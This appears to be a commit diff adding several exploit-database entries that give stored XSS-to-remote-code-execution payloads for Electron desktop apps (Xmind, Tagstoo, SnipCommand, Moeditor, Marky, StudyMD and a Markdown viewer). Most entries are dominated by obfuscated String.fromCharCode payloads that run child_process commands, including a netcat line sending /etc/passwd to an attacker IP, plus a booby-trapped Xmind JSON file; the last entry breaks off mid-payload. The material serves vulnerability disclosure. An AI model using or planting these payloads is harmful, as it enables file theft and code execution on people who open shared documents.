If your projects documentation is written in Markdown, with md files dispersed throughout your project tree, Markdown Explorer displays md files in a tree structure, and it allows filtering by file name or by file content.
Just drop a folder on the window (or click on the folder icon on top left) to show the Markdown documentation of this folder. Then, explore the tree on the left, and toggle view/edit mode on md file with the button on the top right.
# Vulnerability Description:
The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately.
The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to
the remote attacker to get remote execution on the computer.
#Proof
https://imgur.com/a/w4bcPWs
# Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
[<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)

59
exploits/multiple/webapps/49827.js Normal file
View file

@ -0,0 +1,59 @@
# Exploit Title: Xmind 2020 - XSS to RCE
# Exploit Author: TaurusOmar
# Date: May 4th, 2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://www.xmind.net/
# Version: 2020
# Tested on: Windows, Linux, MacOs
# Software Description:
XMind, a full-featured mind mapping and brainstorming tool, designed to generate ideas, inspire creativity, brings efficiency both in work and life. Millions and millions of WFH people love it.
Many great products start with a small idea. Mind map can really be useful at the beginning of a project. Use it to record every idea in the meeting, you might be surprised by the difference and achievement it makes in the long run.
# Vulnerability Description:
The software allows you to store payloads in the form of files or as custom header titles, once the malicious code is entered, the payload will be executed when the victim moves the mouse or clicks.
The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the
the remote attacker to get remote execution on the computer.
#Proof video
https://imgur.com/a/t96Nxo5
# Payload 2: exec(/etc/passwd)
#Decode Payload
<script>
const { spawn } = require("child_process");
const cat = spawn("cat", ["/etc/passwd"]);
cat.stdout.on("data", data => {
alert(`stdout: ${data}`);
});</script>
#Encode Payload
<img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,99,111,110,115,116,32,123,32,115,112,97,119,110,32,125,32,61,32,114,101,113,117,105,114,101,40,34,99,104,105,108,100,95,112,114,111,99,101,115,115,34,41,59,10,99,111,110,115,116,32,99,97,116,32,61,32,115,112,97,119,110,40,34,99,97,116,34,44,32,91,34,47,101,116,99,47,112,97,115,115,119,100,34,93,41,59,10,99,97,116,46,115,116,100,111,117,116,46,111,110,40,34,100,97,116,97,34,44,32,100,97,116,97,32,61,62,32,123,10,32,32,32,32,97,108,101,114,116,40,96,115,116,100,111,117,116,58,32,36,123,100,97,116,97,125,96,41,59,10,125,41,59,60,47,115,99,114,105,112,116,62))>
# Payload 2: exec(calc)
#Decode Payload
<script>
var Process = process.binding('process_wrap').Process;
var proc = new Process();
proc.onexit = function(a,b) {};
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key+'='+env[key]);
proc.spawn({file:'/usr/bin/gnome-calculator',cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]});
</script>
#Encode Payload
<img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>
# File Malicious.json Payload
[{"id":"5609f1388fd8c10e8f8798f104","class":"sheet","title":"Map 1","rootTopic":{"id":"b9aa22deba98b3b20c7ac8aca2","class":"topic","title":"\">'><img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,108,101,116,32,123,32,115,112,97,119,110,32,125,32,61,32,114,101,113,117,105,114,101,40,34,99,104,105,108,100,95,112,114,111,99,101,115,115,34,41,59,10,108,101,116,32,108,115,32,61,32,115,112,97,119,110,40,34,108,115,34,44,32,91,34,45,108,97,34,93,41,59,10,108,115,46,115,116,100,111,117,116,46,111,110,40,34,100,97,116,97,34,44,32,100,97,116,97,32,61,62,32,123,10,32,32,32,32,97,108,101,114,116,40,96,115,116,100,111,117,116,58,32,36,123,100,97,116,97,125,96,41,59,125,41,59,60,47,115,99,114,105,112,116,62,10,10))>","structureClass":"org.xmind.ui.map.unbalanced","children":{"attached":[{"id":"b58888b5ceebbf0e68dada0656","title":"Main Topic 1","titleUnedited":true},{"id":"193b56735e689ae86a01d91513","title":"Main Topic 2","titleUnedited":true},{"id":"67ddbcb1-85c9-4478-a0aa-580e9fdcd971","title":"Main Topic 3","titleUnedited":true}]},"extensions":[{"content":[{"content":"3","name":"right-number"}],"provider":"org.xmind.ui.map.unbalanced"}]},"theme":{"id":"c669ec6d4d48895260d968fc99","importantTopic":{"type":"topic","properties":{"fo:font-weight":"bold","fo:color":"#2b2b2b","svg:fill":"#FFDC34"}},"minorTopic":{"type":"topic","properties":{"fo:font-weight":"bold","fo:color":"#2b2b2b","svg:fill":"#AB9738"}},"expiredTopic":{"type":"topic","properties":{"fo:font-style":"italic","fo:text-decoration":" line-through"}},"centralTopic":{"type":"topic","styleId":"9a13b7d6-cd05-44c3-b903-6c3a50edc46e","properties":{"shape-class":"org.xmind.topicShape.roundedRect","svg:fill":"#1B1B1D","fo:font-family":"Montserrat","fo:font-weight":"600","fo:font-style":"normal","line-width":"3","line-color":"#292929","border-line-width":"0"}},"map":{"type":"map","styleId":"f0e1f9bb-a8f5-486a-a70a-b72b2b6560d3","properties":{"svg:fill":"#000000"}},"subTopic":{"type":"topic","styleId":"9ea90eed-1da0-4c93-bac4-2085e16a0faf","properties":{"fo:font-family":"Montserrat","svg:fill":"#636366","shape-class":"org.xmind.topicShape.roundedRect","fo:font-size":"14pt","fo:text-align":"left","border-line-width":"0","fo:color":"#FFFFFF"}},"mainTopic":{"type":"topic","styleId":"42065f7f-018c-4eb9-9dc7-3a7bbf464915","properties":{"fo:font-family":"Montserrat","svg:fill":"#3A3A3C","border-line-width":"0","fo:font-weight":"600","fo:font-style":"normal","fo:font-size":"18pt","fo:text-align":"left","fo:color":"#FFFFFF","line-width":"2"}},"summaryTopic":{"type":"topic","styleId":"c8f4c32b-2607-4fae-bb85-b8736039e941","properties":{"fo:font-family":"Montserrat","svg:fill":"#8E8E93","fo:font-weight":"500","fo:font-style":"normal","line-color":"#292929","border-line-width":"0"}},"calloutTopic":{"type":"topic","styleId":"6f8bd667-fb82-4d0d-899f-05dc76c5945e","properties":{"fo:font-family":"Montserrat","svg:fill":"#8E8E93","fo:font-size":"14pt","fo:font-weight":"500","fo:font-style":"normal"}},"floatingTopic":{"type":"topic","styleId":"c9509bc2-2641-4f5f-8b38-e62c14c907f9","properties":{"fo:font-family":"Montserrat","border-line-width":"0","fo:font-weight":"500","fo:font-style":"normal","line-width":"2","line-color":"#292929"}},"boundary":{"type":"boundary","styleId":"0d7cf959-3b54-4849-88e1-cc0fc8c60341","properties":{"svg:fill":"#545455","shape-class":"org.xmind.boundaryShape.roundedRect","line-color":"#5D5D60","fo:font-weight":"500","fo:font-style":"normal","fo:color":"#FFFFFF","fo:font-size":"13pt","fo:font-family":"Montserrat"}},"relationship":{"type":"relationship","styleId":"57da2f8e-3f8d-47ee-a802-93023fc802c1","properties":{"line-color":"#8E8E93","line-width":"2","fo:font-weight":"500","fo:font-style":"normal","fo:font-family":"Montserrat","fo:color":"#FFFFFF","fo:font-size":"13pt"}},"summary":{"type":"summary","styleId":"ddeb9d94-1678-4129-8796-42b036e08dd2","properties":{"line-color":"#5A5A5A"}}},"topicPositioning":"fixed"}]

55
exploits/multiple/webapps/49828.js Normal file
View file

@ -0,0 +1,55 @@
# Exploit Title: Tagstoo 2.0.1 - Stored XSS to RCE
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://tagstoo.sourceforge.io/
# Version: v2.0.1
# Tested on: Windows, Linux, MacOs
# Software Description:
Software to tag folders and files, with multimedia and epubs preview.
You can export data with the tagging information to a file, as backup or to import it in any computer.
# Vulnerability Description:
The software allows you to store payloads in the form of files or custom tags, once the malicious code is entered, the payload will be executed immediately.
The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the
the remote attacker to get remote execution on the computer or directly open the folder in the program.
# Proof video
https://imgur.com/a/smeAjaW
# Payload 1: exec(calc)
#Decode Payload
<script>
var Process = process.binding('process_wrap').Process;
var proc = new Process();
proc.onexit = function(a,b) {};
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key+'='+env[key]);
proc.spawn({file:'/usr/bin/gnome-calculator',cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]});
</script>
#Encode Payload
<img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>
# Payload 2: exec(netcat remote stolen file => /etc/passwd)
#Decode Payload
<audio src=x onerror="const exec= require('child_process').exec;
exec('nc -w 3 192.168.111.129 1337 < /etc/passwd', (e, stdout, stderr)=> { if (e instanceof Error) {
console.error(e); throw e; } console.log('stdout ', stdout);
console.log('stderr ', stderr);});
alert('1')">
#Encode Payload
<img src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62))>

26
exploits/multiple/webapps/49829.js Normal file
View file

@ -0,0 +1,26 @@
# Exploit Title: SnipCommand 0.1.0 - XSS to RCE
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://github.com/gurayyarar/SnipCommand
# Version: 0.1.0
# Tested on: Windows, Linux, MacOs
# Software Description:
Open source command snippets manager for organize and copy fast.
It helps you create, organize and store your commands (Excel formulas, Sql Queries, Terminal commands, etc.) with dynamic parameters for quick copy to it. Describe your commands with dynamic parameters also support documentation about your snippets. You can select or specify your dynamic values using with selectbox/inputbox for ready to paste the workspace. You can organize with tags.
# Vulnerability Description:
The software allows you to store payloads in the form of files or as titles in their dynamic values, once the malicious code is entered, the payload will be executed immediately.
The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the
the remote attacker to get remote execution on the computer.
#Proof video
https://imgur.com/a/I2reH1M
# Payload: exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>

28
exploits/multiple/webapps/49830.js Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: Moeditor 0.2.0 - Persistent Cross-Site Scripting
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://moeditor.js.org/
# Version: 0.2.0
# Tested on: Windows, Linux, MacOs
# Software Description:
Software to view and edit sales documentation
Moeditor shows the md files in its editor allows to carry out projects easily, you can open your own files or share with other users
# Vulnerability Description:
The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately.
The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to
the remote attacker to get remote execution on the computer.
#Proof video
https://imgur.com/a/UdP4JaX
# Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
[<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)

28
exploits/multiple/webapps/49831.js Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: Marky 0.0.1 - Persistent Cross-Site Scripting
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://github.com/vesparny/marky
# Version: 0.0.1
# Tested on: Linux, MacOs, Windows
# Software Description:
Marky is an editor for markdown with a friendly interface that allows you to view, edit and load files (.md). Marky is still under development. You can download the latest version from the releases page.
# Vulnerability Description:
The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately.
The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to
the remote attacker to get remote execution on the computer.
#Proof Video
https://imgur.com/a/qclfrUx
# Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
[<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)

27
exploits/multiple/webapps/49832.js Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: StudyMD 0.3.2 - Persistent Cross-Site Scripting
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://github.com/jotron/StudyMD
# Version: 0.3.2
# Tested on: Windows, Linux, MacOs
# Software Description:
A cool app to study with markdown. Turns your Markdown-Summaries to Flashcard.
Allows user to create flash cards based on markdown files (.md) for easy viewing of their structure.
# Vulnerability Description:
The software allows you to store payloads within your flash card manager, as well as upload files (.md) once the malicious code is entered, the payload will be executed immediately. The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to the
the remote attacker to get remote execution on the computer.
#Proof Video
https://imgur.com/a/lDHKEIp
# Payload: exec(AttackerReverse netcat stolen => /etc/passwd) && exec(calc)
[<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,11